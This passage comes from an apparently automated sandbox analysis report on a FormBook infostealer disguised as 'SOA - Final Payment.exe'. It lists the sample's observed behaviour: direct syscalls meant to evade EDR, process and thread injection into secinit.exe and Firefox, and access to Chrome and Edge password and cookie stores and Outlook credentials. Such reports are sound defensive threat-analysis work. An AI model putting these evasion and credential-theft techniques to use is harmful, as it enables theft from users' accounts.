                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE59C mov eax, dword ptr fs:[00000030h]5_2_012AE59C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FB594 mov eax, dword ptr fs:[00000030h]5_2_012FB594
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FB594 mov eax, dword ptr fs:[00000030h]5_2_012FB594
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AC5ED mov eax, dword ptr fs:[00000030h]5_2_012AC5ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AC5ED mov eax, dword ptr fs:[00000030h]5_2_012AC5ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012725E0 mov eax, dword ptr fs:[00000030h]5_2_012725E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E5E7 mov eax, dword ptr fs:[00000030h]5_2_0129E5E7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E5E7 mov eax, dword ptr fs:[00000030h]5_2_0129E5E7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E5E7 mov eax, dword ptr fs:[00000030h]5_2_0129E5E7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E5E7 mov eax, dword ptr fs:[00000030h]5_2_0129E5E7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E5E7 mov eax, dword ptr fs:[00000030h]5_2_0129E5E7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E5E7 mov eax, dword ptr fs:[00000030h]5_2_0129E5E7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E5E7 mov eax, dword ptr fs:[00000030h]5_2_0129E5E7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129E5E7 mov eax, dword ptr fs:[00000030h]5_2_0129E5E7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915F4 mov eax, dword ptr fs:[00000030h]5_2_012915F4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915F4 mov eax, dword ptr fs:[00000030h]5_2_012915F4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915F4 mov eax, dword ptr fs:[00000030h]5_2_012915F4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915F4 mov eax, dword ptr fs:[00000030h]5_2_012915F4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915F4 mov eax, dword ptr fs:[00000030h]5_2_012915F4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012915F4 mov eax, dword ptr fs:[00000030h]5_2_012915F4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013435D7 mov eax, dword ptr fs:[00000030h]5_2_013435D7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013435D7 mov eax, dword ptr fs:[00000030h]5_2_013435D7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013435D7 mov eax, dword ptr fs:[00000030h]5_2_013435D7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE5CF mov eax, dword ptr fs:[00000030h]5_2_012AE5CF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE5CF mov eax, dword ptr fs:[00000030h]5_2_012AE5CF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A55C0 mov eax, dword ptr fs:[00000030h]5_2_012A55C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012995DA mov eax, dword ptr fs:[00000030h]5_2_012995DA
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012765D0 mov eax, dword ptr fs:[00000030h]5_2_012765D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA5D0 mov eax, dword ptr fs:[00000030h]5_2_012AA5D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA5D0 mov eax, dword ptr fs:[00000030h]5_2_012AA5D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013455C9 mov eax, dword ptr fs:[00000030h]5_2_013455C9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED5D0 mov eax, dword ptr fs:[00000030h]5_2_012ED5D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED5D0 mov ecx, dword ptr fs:[00000030h]5_2_012ED5D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C427 mov eax, dword ptr fs:[00000030h]5_2_0126C427
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E420 mov eax, dword ptr fs:[00000030h]5_2_0126E420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E420 mov eax, dword ptr fs:[00000030h]5_2_0126E420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E420 mov eax, dword ptr fs:[00000030h]5_2_0126E420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6420 mov eax, dword ptr fs:[00000030h]5_2_012F6420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6420 mov eax, dword ptr fs:[00000030h]5_2_012F6420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6420 mov eax, dword ptr fs:[00000030h]5_2_012F6420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6420 mov eax, dword ptr fs:[00000030h]5_2_012F6420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6420 mov eax, dword ptr fs:[00000030h]5_2_012F6420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6420 mov eax, dword ptr fs:[00000030h]5_2_012F6420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6420 mov eax, dword ptr fs:[00000030h]5_2_012F6420
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA430 mov eax, dword ptr fs:[00000030h]5_2_012AA430
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129340D mov eax, dword ptr fs:[00000030h]5_2_0129340D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A8402 mov eax, dword ptr fs:[00000030h]5_2_012A8402
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A8402 mov eax, dword ptr fs:[00000030h]5_2_012A8402
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A8402 mov eax, dword ptr fs:[00000030h]5_2_012A8402
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F7410 mov eax, dword ptr fs:[00000030h]5_2_012F7410
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01271460 mov eax, dword ptr fs:[00000030h]5_2_01271460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01271460 mov eax, dword ptr fs:[00000030h]5_2_01271460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01271460 mov eax, dword ptr fs:[00000030h]5_2_01271460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01271460 mov eax, dword ptr fs:[00000030h]5_2_01271460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01271460 mov eax, dword ptr fs:[00000030h]5_2_01271460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128F460 mov eax, dword ptr fs:[00000030h]5_2_0128F460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128F460 mov eax, dword ptr fs:[00000030h]5_2_0128F460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128F460 mov eax, dword ptr fs:[00000030h]5_2_0128F460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128F460 mov eax, dword ptr fs:[00000030h]5_2_0128F460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128F460 mov eax, dword ptr fs:[00000030h]5_2_0128F460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128F460 mov eax, dword ptr fs:[00000030h]5_2_0128F460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0134547F mov eax, dword ptr fs:[00000030h]5_2_0134547F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FC460 mov ecx, dword ptr fs:[00000030h]5_2_012FC460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129A470 mov eax, dword ptr fs:[00000030h]5_2_0129A470
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129A470 mov eax, dword ptr fs:[00000030h]5_2_0129A470
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129A470 mov eax, dword ptr fs:[00000030h]5_2_0129A470
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F453 mov eax, dword ptr fs:[00000030h]5_2_0132F453
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127B440 mov eax, dword ptr fs:[00000030h]5_2_0127B440
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127B440 mov eax, dword ptr fs:[00000030h]5_2_0127B440
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127B440 mov eax, dword ptr fs:[00000030h]5_2_0127B440
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeMemory written: C:\Users\user\Desktop\SOA - Final Payment.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: NULL target: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeSection loaded: NULL target: C:\Windows\SysWOW64\secinit.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\secinit.exeThread register set: target process: 8188Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\secinit.exeThread APC queued: target process: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeProcess created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exeProcess created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2604341132.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655457243.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2605176992.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2604341132.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655457243.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2605176992.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2604341132.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655457243.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2605176992.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000002.2604341132.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 00000009.00000000.1655457243.0000000000F61000.00000002.00000001.00040000.00000000.sdmp, 6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2605176992.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Users\user\Desktop\SOA - Final Payment.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.SOA - Final Payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SOA - Final Payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1733539171.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2605336113.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\secinit.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\secinit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.SOA - Final Payment.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SOA - Final Payment.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2602456510.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2603116280.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1730940118.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1733251033.0000000001590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2605626950.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1733539171.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2605336113.0000000002680000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

